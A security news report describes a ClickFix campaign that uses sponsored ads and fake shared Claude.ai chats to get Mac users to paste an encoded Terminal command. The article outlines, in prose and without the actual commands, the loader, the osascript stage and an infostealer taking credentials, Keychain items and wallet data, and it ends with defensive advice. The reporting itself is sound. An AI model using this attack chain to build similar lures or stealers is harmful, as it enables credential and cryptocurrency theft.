Sponsored ads lead Mac users to fake Claude chats

Security researchers found paid search ads directing Mac users to shared Claude.ai chats that impersonate official guides. The pages instruct visitors to paste commands into Terminal. Following those instructions results in malware commonly known as ClickFix that harvests stored credentials and wallet information.

Researchers located the pages by searching terms such as “Claude Mac download” and following sponsored results that appear to link to the legitimate claude.ai domain. The links resolve to attacker-created shared chats labeled with titles like “Claude Code on Mac” or “Apple Support,” which present step‑by‑step instructions and a base64‑encoded command for Terminal.

When a user pastes the encoded command, it decodes and runs a loader shell script pulled from infrastructure controlled by the attackers. The loader executes in memory, profiles the machine, downloads a second‑stage payload and invokes macOS’s osascript engine to run further code. The sequence allows remote code execution without installing a conventional application or leaving a standard executable on disk.

The resulting payload behaves like a MacSync‑style infostealer. It collects browser passwords and cookies, extracts items from the macOS Keychain and scans for cryptocurrency wallet data. Collected files and credentials are bundled and sent to attacker servers over HTTP.

Some shared chats use pressure tactics to push victims to act quickly, displaying countdown timers, user counters and urgent wording. Attackers are able to purchase sponsored search placements that appear legitimate and direct users to these malicious shared chats, increasing the chance that victims will follow the instructions.

Apple added warnings for ClickFix‑style social engineering in macOS Tahoe 26.4 and later. Machines on earlier macOS releases do not show those built‑in warnings.

Researchers recommend not running commands copied from websites, emails or messages unless the source is verified and the user understands the action. Verify instructions against official documentation or by contacting support. Typing commands manually instead of pasting can reduce the risk of executing hidden payloads. Use up‑to‑date anti‑malware with web protection and consider browser tools that block malicious pages or warn when a site attempts to copy content to the clipboard.